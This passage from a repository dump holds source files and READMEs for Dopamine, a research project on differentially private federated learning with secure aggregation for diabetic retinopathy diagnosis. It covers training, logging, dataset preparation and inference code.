the context from worker 1\n evaluator = Evaluator(context)\n\n else: # Workers 2:num_users\n # The workers receive the context, public key, and secret key from worker 1\n context = comm.recv(source=1, tag=0)\n parms = context.parms()\n public_key = comm.recv(source=1, tag=1)\n secret_key = comm.recv(source=1,tag=2)\n encryptor = Encryptor(context, public_key)\n decryptor = Decryptor(context, secret_key)\n # Batching is done through an instance of the PolyCRTBuilder class so need\n # to start by constructing one.\n crtbuilder = PolyCRTBuilder(context)\n\n # define paths\n path_project = os.path.abspath('..')\n logger = SummaryWriter('../logs')\n\n args = args_parser()\n exp_details(args)\n\n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu'\n m = max(int(args.frac * args.num_users), 1) # Number of active workers in each round\n # load datasets in each user. Note that the datasets are not loaded in the parameter server.\n if rank >= 1:\n train_dataset, user_groups = get_train_dataset(args,rank) # user_groups consists of the ids of the data samples that belong to current worker\n\n if rank == 0:\n # BUILD MODEL\n test_dataset = get_test_dataset(args)\n if args.model == 'cnn':\n # Convolutional neural network\n if args.dataset == 'mnist':\n global_model = CNNMnist(args=args)\n elif args.dataset == 'fmnist':\n global_model = CNNFashion_Mnist(args=args)\n elif args.dataset == 'cifar10' or args.dataset == 'cifar100':\n global_model = CNNCifar(args=args)\n else:\n exit('Error: unrecognized model')\n\n ### DPSGD OPACUS ###\n if args.withDP:\n try:\n inspector = DPModelInspector()\n inspector.validate(global_model)\n print(\"Model's already Valid!\\n\")\n except:\n global_model = module_modification.convert_batchnorm_modules(global_model)\n inspector = DPModelInspector()\n print(f\"Is the model valid? {inspector.validate(global_model)}\")\n print(\"Model is convereted to be Valid!\\n\")\n\n u_steps = np.zeros(args.num_users)\n ###########\n\n # Set the model to train and send it to device.\n global_model.to(device)\n global_model.train()\n print(global_model)\n\n # copy weights\n global_weights = global_model.state_dict()\n\n # Training\n val_acc_list, net_list = [], []\n cv_loss, cv_acc = [], []\n print_every = 10\n val_loss_pre, counter = 0, 0\n\n for idx in range(1, args.num_users + 1): # this loop sends the global model to all the workers\n comm.send(global_model, dest=idx, tag=idx)\n\n for epoch in range(args.epochs):\n local_weights, local_losses = [], []\n idxs_users = np.random.choice(range(1,args.num_users+1), m, replace=False)\n print(\"active users: \", str(idxs_users))\n for i in idxs_users: # send the epoch values only to the active workers in the current round\n print(\"Sending epoch to active_user: \", str(i))\n comm.send(epoch, dest=i,tag=i)\n\n if (epoch > 0) and (epoch < args.epochs -1):\n for idx in idxs_users: # this loop sends the encrypted global aggregate to all active workers of the current round\n comm.send(global_weights, dest=idx, tag=idx)\n\n #The receives are decoupled from the sends, ELSE the code will send global model, then wait for updates, and only then\n #move to send the global model to the second worker. But we want the processing to be in parallel. Therefore, all the sends are\n #implemented in a loop, and after that all the receives are implemented in a loop\n for idx in idxs_users: # this loop receives the updates from the active workers\n u_steps[idx-1] = comm.recv(source=idx, tag=idx)\n print(idx)\n if epoch == args.epochs-1:\n local_weights.append(comm.recv(source=idx, tag=idx)) # receive unencrypted model update parameters from worker i\n elif epoch < args.epochs-1:\n local_weights.append(recv_enc(idx)) # receive encrypted model update parameters from worker i\n\n #In the last epoch, the weights are received unencrypted,\n #therefore, the weights are aggregated and the global model is updated\n print(\"Length of local weights: \", str(len(local_weights)))\n if epoch == args.epochs-1:\n # update global weights\n global_weights = average_weights(local_weights) # Add the unencrypted weights received\n global_model.load_state_dict(global_weights)\n workers = list(range(1, nworkers + 1))\n print(\"Workers: \", str(workers))\n print(\"Active users in last round: \", str(idxs_users))\n for wkr in idxs_users:\n workers.remove(wkr)\n print(\"Residue workers: \", str(workers)) # Printing the ids of workers which are still listening for next round's communication.\n for i in workers:\n print(\"Sending exit signal to residue worker: \", str(i))\n comm.send(-1, dest=i, tag=i)\n break # break out of the epoch loop.\n elif epoch < args.epochs-1:\n # Add the encrypted weights\n global_weights = average_weights_enc() # Add the encrypted weights received\n\n elif rank >= 1:\n local_model = LocalUpdate(args=args, dataset=train_dataset,\n u_id=rank,\n idxs=user_groups, logger=logger)\n u_step=0\n model = comm.recv(source=0, tag=rank) # global model is received from the parameter server\n print(\"Worker \", str(rank), \" received global model\")\n flattened_lengths = {param_tensor: model.state_dict()[param_tensor].numel() for param_tensor in\n model.state_dict()}\n shapes = {param_tensor: list(model.state_dict()[param_tensor].size()) for param_tensor in\n model.state_dict()} # dictionary of shapes of tensors\n\n while True:\n epoch = comm.recv(source=0, tag=rank) # receive the epoch/communication round that the parameter server is in\n if epoch == -1:\n break\n #The server sends the latest weight aggregate to this worker,\n #based on which the local model is updated before starting to train.\n if (epoch < args.epochs-1) and (epoch > 0):\n enc_global_aggregate = comm.recv(source=0, tag=rank)\n ## decrypt and recompose enc_global_aggregate\n global_aggregate = dec_recompose(enc_global_aggregate)\n model.load_state_dict(global_aggregate)\n u_step += 1\n # Now perform one iteration\n w, loss, u_step = local_model.update_weights(model=model, global_round=epoch,u_step=u_step)\n comm.send(u_step, dest=0, tag=rank) # send the step number\n if epoch < args.epochs-1:\n send_enc() # send encrypted model update parameters to the global agent\n elif epoch == args.epochs-1:\n comm.send(w, dest=0, tag = rank) # send unencrypted model update parameters to the global agent\n break\n\n if rank==0:\n # Test inference after completion of training\n test_acc, test_loss = test_inference(args, global_model, test_dataset)\n\n print(f' \\n Results after {args.epochs} global rounds of training:')\n print(\"|---- Test Accuracy: {:.2f}%\".format(100 * test_acc))\n\n print('\\n Total Run Time: {0:0.4f}'.format(time.time() - start_time))\n\n\n\n"
},
{
"alpha_fraction": 0.5588235259056091,
"alphanum_fraction": 0.5702614188194275,
"avg_line_length": 34.94117736816406,
"blob_id": "a55a3d0ce963cc1817a27e5c24968d477a3f7c44",
"content_id": "1165b7e370a06bd2692d1966e38c7eb636f46979",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1224,
"license_type": "permissive",
"max_line_length": 146,
"num_lines": 34,
"path": "/private_training/src/logging_results.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "\nimport os\nimport numpy as np\nfrom utils import test_inference\n\n\ndef logging(args, epoch, train_loss, test_log, epsilon_log=None):\n print(\"\\nEpoch:\", epoch+1)\n\n log_dir_train = './logs/train_log/'\n if not os.path.exists(log_dir_train):\n os.makedirs(log_dir_train)\n \n print('Average train loss:', train_loss[-1]) \n with open(log_dir_train+args.exp_name+'_train.txt', 'w') as f:\n for item in train_loss:\n f.write(\"%s\\n\" % item)\n\n log_dir_test = './logs/test_log/'\n if not os.path.exists(log_dir_test):\n os.makedirs(log_dir_test)\n\n print(\"Test Accuracy: {:.2f}%\".format(100*test_log[-1][0])) \n with open(log_dir_test+args.exp_name+'_test.txt', 'w') as f:\n for item in test_log:\n f.write(\"%s\\n\" % item)\n\n if epsilon_log:\n log_dir_eps = './logs/privacy_log/'\n if not os.path.exists(log_dir_eps):\n os.makedirs(log_dir_eps)\n print(\"epsilons: max {:.2f}, mean {:.2f}, std {:.2f}\".format(np.max(epsilon_log[-1]), np.mean(epsilon_log[-1]), np.std(epsilon_log[-1])))\n with open(log_dir_eps+args.exp_name+'_eps.txt', 'w') as f:\n for item in epsilon_log:\n f.write(\"%s\\n\" % item)\n\n"
},
{
"alpha_fraction": 0.5751329660415649,
"alphanum_fraction": 0.5764627456665039,
"avg_line_length": 27.39622688293457,
"blob_id": "39641ccd014ad80597c51d1c8f2468f96aec4478",
"content_id": "4058723be3a6ab6cd376d389e9181ac94911ef38",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1504,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 53,
"path": "/private_training/src/dr_dataset_to_numpy.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport copy\nimport time\nimport pickle\nimport numpy as np\nimport torch\nfrom options import args_parser\nfrom datasets import get_dataset\n\n\n\nif __name__ == '__main__':\n \n ############# Common ###################\n args = args_parser() \n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu' \n \n # load dataset and user groups\n train_dataset, test_dataset, user_groups = get_dataset(args)\n \n print(\"train_dataset size:\", len(train_dataset))\n print(\"test_dataset size:\", len(test_dataset))\n # print(\"data shape:\", train_dataset[0][0].shape)\n print(\"train\")\n dr_images = []\n dr_labels = []\n for i in range(len(train_dataset)): \n _image, _label = train_dataset[i]\n dr_images.append(_image.numpy())\n dr_labels.append(_label)\n print(\" \", i, end=\"\\r\")\n print(\"\")\n dr_images = np.array(dr_images)\n dr_labels = np.array(dr_labels)\n np.save(\"dr_train_images.npy\", dr_images)\n np.save(\"dr_train_labels.npy\", dr_labels)\n print(\"test\")\n dr_images = []\n dr_labels = []\n for i in range(len(test_dataset)): \n _image, _label = test_dataset[i]\n dr_images.append(_image.numpy())\n dr_labels.append(_label)\n print(\" \", i, end=\"\\r\")\n print(\"\")\n dr_images = np.array(dr_images)\n dr_labels = np.array(dr_labels)\n np.save(\"dr_test_images.npy\", dr_images)\n np.save(\"dr_test_labels.npy\", dr_labels)\n\n print(\"Done!\")"
},
{
"alpha_fraction": 0.7768834233283997,
"alphanum_fraction": 0.7891178131103516,
"avg_line_length": 69.54545593261719,
"blob_id": "8444f2e112a3831fc659eedb0a810a2a153f90ad",
"content_id": "3170268b23fa06e98be11e44614c92ea90debc6d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3106,
"license_type": "permissive",
"max_line_length": 800,
"num_lines": 44,
"path": "/README.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Dopamine: Differentially Private Federated Learning on Medical Data\n\n- Please read the paper here: https://arxiv.org/abs/2101.11693 \n\n- Chosen as the best submission to [ITU AI/ML in 5G Challenge](https://www.itu.int/en/ITU-T/AI/challenge/2020/Pages/default.aspx) for [ITU-ML-5G-PS-022](https://sites.google.com/view/iitd5g/challenge-problems/privacy-preserving-aiml-in-5g-networks-for-healthcare-applications)\n\n\n## Abstract \nWhile rich medical datasets are hosted in hospitals distributed across the world, concerns on patients' privacy is a barrier against using such data to train deep neural networks (DNNs) for medical diagnostics. We propose Dopamine, a system to train DNNs on distributed datasets, which employs federated learning (FL) with differentially-private stochastic gradient descent (DPSGD), and, in combination with secure aggregation, can establish a better trade-off between differential privacy (DP) guarantee and DNN's accuracy than other approaches. Results on a diabetic retinopathy~(DR) task show that Dopamine provides a DP guarantee close to the centralized training counterpart, while achieving a better classification accuracy than FL with parallel DP where DPSGD is applied without coordination. \n\n## Folders:\n \n1. `report`: includes the final report. For `1.Design document showing the reasons for the choice of privacy-preserving technique and the network architectural components.`\n2. `private_training`: includes the source code and a JupyterNotebook tutorial for training the privacy-preserving model explained in the report. For `2.Source code for the implementation of the privacy-preserving design across various architectural components.`\n3. `private_inference`: includes the source code and demo for running inference on the privately trained model. For `3.Tested code and Test Report for all implementations- Implementations of Privacy-Preserving AI Technique, Trained Data Model, UI on smartphone.`\n4. `video_demo`: include some video demos showing how to run training and inference. For `4. A Video of the demonstration of Proof-of-Concept.`\n\n\n## Tutorial\n\nWe provided a Jupyter Notebook for training on Google Colab. Please see the file `JNotebook_running_FSCDP_on_Colab.ipynb` in the `private_training` folder.\n\n## Live Demo:\n\nPlease use this link to get an inference on a Diabetic Retinopathy medical image:\n\nhttps://imperial-diagnostics.herokuapp.com/\n\n(Note: implementing the pure private inference is still in progress...)\n\n## Citation\nIf you find the provided code or the proposed algorithms useful, please cite this work as:\n```bibtex\n@article{malekzadeh2021dopamine,\n title={Dopamine: Differentially Private Federated Learning on Medical Data},\n author={Malekzadeh, Mohammad and Hasircioglu, Burak and Mital, Nitish and Katarya, Kunal and Ozfatura, Mehmet Emre and Gündüz, Deniz}, \n journal= {The Second AAAI Workshop on Privacy-Preserving Artificial Intelligence (PPAI-21)},\n year={2021},\n url = {https://github.com/ipc-lab/private-ml-for-health}\n}\n```\n\n## Collaboration/Contribution\nWe kindly welcome collaboration and/or contribution to this work. Please feel free to drop a line to us via email or by opening an issue. \n"
},
{
"alpha_fraction": 0.6490156054496765,
"alphanum_fraction": 0.6768499612808228,
"avg_line_length": 35.82500076293945,
"blob_id": "e629b6c085710824da1350d2ce485f7d7c2955e8",
"content_id": "0b1d9491c3c3b996bb1b47ef4c74d5c4882e9c92",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1473,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 40,
"path": "/private_inference/app/commons.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import io\nfrom PIL import Image\nfrom torchvision import models\nimport torch\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport urllib\nimport os\n\ndef get_model_from_global_agent():\n global_model = models.squeezenet1_1(pretrained=True)\n global_model.classifier[1] = nn.Conv2d(512, 5, kernel_size=(1,1), stride=(1,1))\n global_model.num_classes = 5\n global_model.to(torch.device('cpu'))\n map_location=torch.device('cpu')\n model_weights_link = 'https://drive.google.com/uc?id=11pb2yJKXgyYC9XnB9cd6HlNCFNxnlY1D'\n model_weights_path = './model/squeezenet_0.pt'\n urllib.request.urlretrieve(model_weights_link, model_weights_path)\n global_model.load_state_dict(torch.load(\"./model/squeezenet_0.pt\", map_location=torch.device('cpu')))\n os.remove(model_weights_path)\n global_model.eval()\n return global_model\n\n\ndef transform_image(image_bytes):\n apply_transform = transforms.Compose([transforms.Resize(265),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n image = Image.open(io.BytesIO(image_bytes)).convert('RGB')\n return apply_transform(image).unsqueeze(0)\n\n\n\n# change to DR dataset format\ndef format_class_name(class_name):\n class_name = class_name.replace('_', ' ')\n class_name = class_name.title()\n return class_name\n"
},
{
"alpha_fraction": 0.5528191924095154,
"alphanum_fraction": 0.5664290189743042,
"avg_line_length": 36.63414764404297,
"blob_id": "850069d8d8ef081914fcfe8316020f7afa4bb0e3",
"content_id": "d25dcb920ea69228732c8384095e2a270b930954",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4629,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 123,
"path": "/private_training/src/baseline_main.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\n# import matplotlib.pyplot as plt\n\nfrom datasets import get_dataset\nfrom options import args_parser\nfrom utils import test_inference\nfrom models import CNNMnistRelu, CNNMnistTanh, CNNFashion_MnistRelu, CNNFashion_MnistTanh\nfrom torchvision import models \nfrom torchsummary import summary\n\nif __name__ == '__main__':\n\n ############# Common ###################\n args = args_parser()\n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu'\n\n # load datasets\n train_dataset, test_dataset, _ = get_dataset(args)\n\n # BUILD MODEL\n if args.model == 'cnn':\n # Convolutional neural netork\n if args.dataset == 'mnist':\n if args.activation == 'relu':\n global_model = CNNMnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNMnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'fmnist':\n if args.activation == 'relu':\n global_model = CNNFashion_MnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNFashion_MnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'cifar10':\n # global_model = models.resnet18(num_classes=10) \n if args.activation == 'relu':\n global_model = CNNCifar10Relu()\n elif args.activation == 'tanh':\n global_model = CNNCifar10Tanh()\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n elif args.dataset == 'dr':\n if args.activation == 'relu':\n global_model = CNNCifar10Relu()\n elif args.activation == 'tanh':\n global_model = CNNCifar10Tanh()\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n elif args.dataset == 'cifar100': \n global_model = models.resnet50(num_classes=100)\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n else:\n exit('Error: unrecognized model')\n ############# Common ###################\n\n # Set the model to train and send it to device.\n global_model.train() \n \n # Set optimizer and criterion\n if args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(global_model.parameters(), lr=args.lr, momentum=args.momentum)\n elif args.optimizer == 'adam':\n optimizer = torch.optim.Adam(global_model.parameters(), lr=args.lr)\n\n trainloader = DataLoader(train_dataset, batch_size=args.local_bs, shuffle=True)\n criterion = nn.CrossEntropyLoss()\n \n epoch_loss = []\n\n # train_log = []\n test_log = []\n for epoch in range(args.epochs):\n batch_loss = []\n\n for batch_idx, (images, labels) in enumerate(trainloader):\n \n images, labels = images.to(device), labels.to(device)\n\n optimizer.zero_grad()\n outputs = global_model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n # if batch_idx % args.verbose == 0:\n # print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n # epoch+1, batch_idx * len(images), len(trainloader.dataset),\n # 100. * batch_idx / len(trainloader), loss.item()))\n batch_loss.append(loss.item())\n\n loss_avg = sum(batch_loss)/len(batch_loss)\n print(\"\\nEpoch:\", epoch+1)\n print('Train loss:', loss_avg)\n epoch_loss.append(loss_avg)\n\n # training accuracy\n # _acc, _loss = test_inference(args, global_model, train_dataset)\n # print('Train on', len(train_dataset), 'samples')\n # print(\"Train Accuracy: {:.2f}%\".format(100*_acc))\n # train_log.append([_acc, _loss])\n\n # testing accuracy\n _acc, _loss = test_inference(args, global_model, test_dataset)\n \n print('Test on', len(test_dataset), 'samples')\n print(\"Test Accuracy: {:.2f}%\".format(100*_acc))\n test_log.append([_acc, _loss])\n\n log_dir = './test_log/'\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n with open(log_dir+args.exp_name+'_test_log.txt', 'w') as f:\n for item in test_log:\n f.write(\"%s\\n\" % item)\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 44,
"blob_id": "7e132a929ca44c667e82e18f632230183ad0f5eb",
"content_id": "58b0b566011bb58bfc84ea8b555acfff5662faa9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 2,
"path": "/report/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "## Final Report\nThe the technical report coressponding to this project can be found here.\n"
},
{
"alpha_fraction": 0.6628478169441223,
"alphanum_fraction": 0.710077166557312,
"avg_line_length": 56.797298431396484,
"blob_id": "d4247213f7a35fd45793d292b984f894515889fc",
"content_id": "99da356839efbc73f8018745026556703d656101",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4287,
"license_type": "permissive",
"max_line_length": 333,
"num_lines": 74,
"path": "/private_training/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Private Training \n\nThis repository produces source code of the training stage for the proposed method in the report.\n\n> In this repository we have used some part of codes from : https://github.com/AshwinRJ/Federated-Learning-PyTorch\n\n## Dataset Preparation \n\nTo prepare the [diabetic retinopathy](https://www.kaggle.com/c/aptos2019-blindness-detection/notebooks?sortBy=scoreDescending) dataset:\n\n 1. First (and just for one time) you need to run this file: `src/dr_dataset_to_numpy.py` with the following commmand:\n\n > python src/dr_dataset_to_numpy.py --dataset=dr --dr_from_np=0\n\n 2. Running the above command will take sometimes to download the dataset and transforms it into numpy arrays and saves it.\n \n 3. After this is completed, for the rest of experiments you need to set `--dr_from_np=1`\n \n\n## How To Run Experiments\n\nIn the following we explain how you can reproduce the results shown in Figure 1 of the report.\n\n### 1. Non-Private Centralized (C)\n\n> python src/federated_main_s2.py --epochs=1 --num_users=1 --frac=1. --local_ep=100 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.001 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=0\n\n\n### 2. Centralized with Central DP (CDP)\n\n> python src/federated_main_s2.py --epochs=1 --num_users=1 --frac=1. --local_ep=100 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.001 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=1 --max_grad_norm = 2. --noise_multiplier = 1. --delta = 1e-4\n\n\n### 3. Non-Private Federated (F)\n\n> python src/federated_main_s3.py --epochs=100 --num_users=10 --frac=.5 --local_ep=5 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.002 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=0\n\n### 4. Federated with Parallel DP (FPDP)\n\n> python src/federated_main_s3.py --epochs=100 --num_users=10 --frac=.5 --local_ep=5 --local_bs=50 --virtual_batch_size=50 --optimizer='sgd' --lr=0.002 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=1 --max_grad_norm = 2. --noise_multiplier = 2. --delta = 1e-4\n\n### 5. Our Federated with Semi-Central DP (FSCDP)\n\n> python src/federated_main_s4.py --epochs=30001 --num_users=10 --frac=1. --local_ep=1 --local_bs=1 --virtual_batch_size=1 --optimizer='sgd' --lr=0.002 --momentum=0.9 --dataset='dr' --dr_from_np=1 --gpu=\"cuda:0\" --withDP=1 --max_grad_norm = 2. --noise_multiplier = 1.15 --delta = 1e-4 --sampling_prob= 0.03425\n\n\nNote that in FSCDP `--epochs=30001` is actually the number of iterations and not epochs. Based on the setting, `--epochs=30001` in FSCDP is similar to having 100 epochs in other FPDP and F setting. Moreover, `--sampling_prob= 0.03425` will translate into a batch size of 10 per user, 100 in total.\n\n### 6. Secure aggregation with Homomorphic Encryption: (under development, so there might still be bugs)\nInstall PySEAL by running the shell file `build_pyseal.sh`:\n``` \n> cd [path to build_pyseal.sh>]\n> chmod +x build_pyseal.sh\n> ./build_pyseal.sh\n```\nThis downloads and builds PySEAL from the source: https://github.com/Lab41/PySEAL.\n\nEnsure that mpi4py is installed. Else install it with `pip install mpi4py`.\n\nFor running 3 processes, with rank 0 process being the server, and rank 1 and rank 2 processes being 2 federated workers (hospitals), run the following for training on MNIST dataset:\n> mpiexec -n 3 python src_secure_aggregation/FLDP_secure_aggregation.py --model=cnn --dataset=mnist --iid=1 --withDP=0 --local_bs=32 --num_users=2 --frac=.5 --local_ep=1 --epochs=20 --verbose=1000\n\n## Tutorial:\n\nPlease see the file `JNotebook_running_FSCDP_on_Colab.ipynb` if you want to perform training on Google Colab.\n\n\n* Updated for running Tutorial:\n\nIf you receive an error about `Nvidia CUDA`, then there are two solutions at the moment:\n\n 1. In the first line at the beginning of the tutorial, use `torch==1.7.0+cu101` instead of `torch==1.6.0+cu101`.\n \n 2. Or, remove that line and just use the second line to install `Opacus`, then restart the notebook, and finally in the colab system files go to `usr —> local —> lib —> python 3.6 —> dist-packages —> opacus` and open `privacy_engine.py` and turn the line `import torchcsprng as csprng` into comment `#import torchcsprng as csprng`.\n"
},
{
"alpha_fraction": 0.5408282279968262,
"alphanum_fraction": 0.5539515614509583,
"avg_line_length": 43.8300666809082,
"blob_id": "23e4f0de2c77d2b79624437264cf7085214b250b",
"content_id": "9de37bbaab0b11fffe1c934a5adcd6467b43d55f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6858,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 153,
"path": "/private_training/src/datasets.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport copy\nimport torch\nimport matplotlib.image as mpimg\nimport urllib.request\nimport zipfile\nimport os\nimport pandas as pd\nfrom torchvision import datasets, transforms\nfrom sampling import dist_datasets_iid, dist_datasets_noniid\nfrom options import args_parser\nfrom torch.utils.data import Dataset, TensorDataset\nimport gdown\n\nclass DRDataset(Dataset):\n def __init__(self, data_label, data_dir, transform):\n super().__init__()\n self.data_label = data_label\n self.data_dir = data_dir\n self.transform = transform\n\n def __len__(self):\n return len(self.data_label)\n\n def __getitem__(self, index):\n img_name = self.data_label.id_code[index] + '.png'\n label = self.data_label.diagnosis[index]\n img_path = os.path.join(self.data_dir, img_name)\n image = mpimg.imread(img_path)\n image = (image + 1) * 127.5\n image = image.astype(np.uint8)\n image = self.transform(image)\n return image, label\n\n\ndef get_dataset(args):\n\n if args.dataset == 'cifar10' or args.dataset == 'cifar100':\n data_dir = '../data/cifar/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n \n if args.dataset == 'cifar10':\n train_dataset = datasets.CIFAR10(data_dir, train=True, download=True,\n transform=apply_transform) \n test_dataset = datasets.CIFAR10(data_dir, train=False, download=True,\n transform=apply_transform)\n elif args.dataset == 'cifar100':\n train_dataset = datasets.CIFAR100(data_dir, train=True, download=True,\n transform=apply_transform)\n test_dataset = datasets.CIFAR100(data_dir, train=False, download=True,\n transform=apply_transform) \n\n elif args.dataset == 'mnist' or args.dataset =='fmnist':\n if args.dataset == 'mnist':\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = '../data/mnist/'\n train_dataset = datasets.MNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n test_dataset = datasets.MNIST(data_dir, train=False, download=True,\n transform=apply_transform)\n\n else:\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = '../data/fmnist/'\n train_dataset = datasets.FashionMNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n test_dataset = datasets.FashionMNIST(data_dir, train=False, download=True,\n transform=apply_transform)\n \n elif args.dataset == 'dr':\n\n if args.dr_from_np == 1:\n _x = torch.Tensor(np.load(\"dr_train_images.npy\"))\n _y = torch.Tensor(np.load(\"dr_train_labels.npy\")).long()\n train_dataset = TensorDataset(_x,_y)\n _x = torch.Tensor(np.load(\"dr_test_images.npy\"))\n _y = torch.Tensor(np.load(\"dr_test_labels.npy\")).long()\n test_dataset = TensorDataset(_x,_y) \n \n else:\n data_dir = '../data/diabetic_retinopathy/'\n if not os.path.exists(data_dir): \n os.makedirs(data_dir)\n \n #download ZIP, unzip it, delete zip file\n dataset_url = \"https://drive.google.com/uc?id=1G-4UhPKiQY3NxQtZiWuOkdocDTW6Bw0u\"\n zip_path = data_dir + 'images.zip'\n gdown.download(dataset_url, zip_path, quiet=False)\n print(\"Extracting...!\")\n \n with zipfile.ZipFile(zip_path, 'r') as zip_ref:\n zip_ref.extractall(data_dir)\n print(\"Extracted!\")\n os.remove(zip_path)\n\n #download train and test dataframes\n test_csv_link = 'https://drive.google.com/uc?id=1dmeYLURzEvx962th4lAxaVN3r6nlhTjS'\n train_csv_link = 'https://drive.google.com/uc?id=1SMb9CRHjB6UH2WnTZDFVSgpA6_nh75qN'\n test_csv_path = data_dir + 'test_set.csv'\n train_csv_path = data_dir + 'train_set.csv'\n urllib.request.urlretrieve(train_csv_link, train_csv_path)\n urllib.request.urlretrieve(test_csv_link, test_csv_path)\n df_train = pd.read_csv(train_csv_path)\n df_test = pd.read_csv(test_csv_path)\n\n #create train and test datasets\n apply_transform = transforms.Compose([transforms.ToPILImage(mode='RGB'),\n transforms.RandomHorizontalFlip(),\n transforms.Resize(265),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n image_directory = data_dir + 'images/'\n train_dataset = DRDataset(data_label = df_train, data_dir = image_directory,\n transform = apply_transform)\n test_dataset = DRDataset(data_label = df_test, data_dir = image_directory,\n transform = apply_transform)\n\n\n if args.sub_dataset_size > 0:\n rnd_indices = np.random.RandomState(seed=0).permutation(len(train_dataset.data)) \n train_dataset.data = train_dataset.data[rnd_indices]\n if torch.is_tensor(train_dataset.targets):\n train_dataset.targets = train_dataset.targets[rnd_indices] \n else:\n train_dataset.targets = torch.tensor(train_dataset.targets)[rnd_indices]\n train_dataset.data = train_dataset.data[:args.sub_dataset_size]\n train_dataset.targets = train_dataset.targets[:args.sub_dataset_size]\n print(\"\\nThe chosen sub dataset has the following shape:\")\n print(train_dataset.data.shape, train_dataset.targets.shape,\"\\n\") \n\n if args.iid: \n user_groups = dist_datasets_iid(train_dataset, args.num_users) \n else:\n user_groups = dist_datasets_noniid(train_dataset, args.num_users,\n num_shards=1000, \n unequal=args.unequal) \n \n return train_dataset, test_dataset, user_groups\n\n## For test\nif __name__ == '__main__':\n args = args_parser()\n train_dataset, test_dataset, user_groups = get_dataset(args)"
},
{
"alpha_fraction": 0.3801843225955963,
"alphanum_fraction": 0.4714285731315613,
"avg_line_length": 32.39230728149414,
"blob_id": "3d11265d22e42c3ba73f49cef3fbf9941317597f",
"content_id": "178bbf8b78c8d9136343ca56bfe0aadce8b9db47",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4340,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 130,
"path": "/private_training/src/models.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
